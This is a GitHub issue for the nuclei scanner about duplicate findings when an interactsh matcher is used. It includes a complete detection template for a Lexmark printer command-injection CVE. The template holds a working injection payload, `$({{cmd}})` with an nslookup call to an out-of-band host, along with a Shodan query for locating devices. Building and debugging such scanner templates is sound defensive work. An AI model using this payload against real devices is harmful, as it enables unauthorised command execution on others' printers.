### ISSUE TITLE
duplicate output when interactsh matcher is used in matcher

### ISSUE THREAD

**Issue by ehsandeep** [projectdiscovery/nuclei#4041]
### Nuclei version:
latest/dev

### Current Behavior:
```console
nuclei -t http/cves/2023/CVE-2023-26067.yaml -u http://target

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.10

		projectdiscovery.io

[INF] Current nuclei version: v2.9.10 (latest)
[INF] Current nuclei-templates version: v9.6.0 (latest)
[INF] New templates added in latest release: 33
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2023-26067] [http] [high] http://target/cgi-bin/fax_change_faxtrace_settings
[CVE-2023-26067] [http] [high] http://target/cgi-bin/fax_change_faxtrace_settings
```

### Expected Behavior:

```console
nuclei -t http/cves/2023/CVE-2023-26067.yaml -u http://target

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.10

		projectdiscovery.io

[INF] Current nuclei version: v2.9.10 (latest)
[INF] Current nuclei-templates version: v9.6.0 (latest)
[INF] New templates added in latest release: 33
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2023-26067] [http] [high] http://target/cgi-bin/fax_change_faxtrace_settings
```

### Steps To Reproduce:

```console
nuclei -t http/cves/2023/CVE-2023-26067.yaml -u http://target
```

### Anything else:

```yaml
id: CVE-2023-26067

info:
  name: Lexmark Printers - Command Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
  reference:
    - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
    - https://github.com/horizon3ai/CVE-2023-26067
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26067
    - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
    - https://support.lexmark.com/alerts/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-26067
    cwe-id: CWE-20
    epss-score: 0.00145
    cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    shodan-query: "Server: Lexmark_Web_Server"
    vendor: lexmark
    product: cxtpc_firmware
  tags: cve,cve2023,printer,iot,lexmark


variables:
  cmd: 'nslookup {{interactsh-url}}'

http:
  - raw:
      - |
        POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 49

        FT_Custom_lbtrace=$({{cmd}})

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(body, 'Fax Trace Settings')
          - status_code == 200
          - contains(interactsh_protocol, 'dns')
        condition: and
```
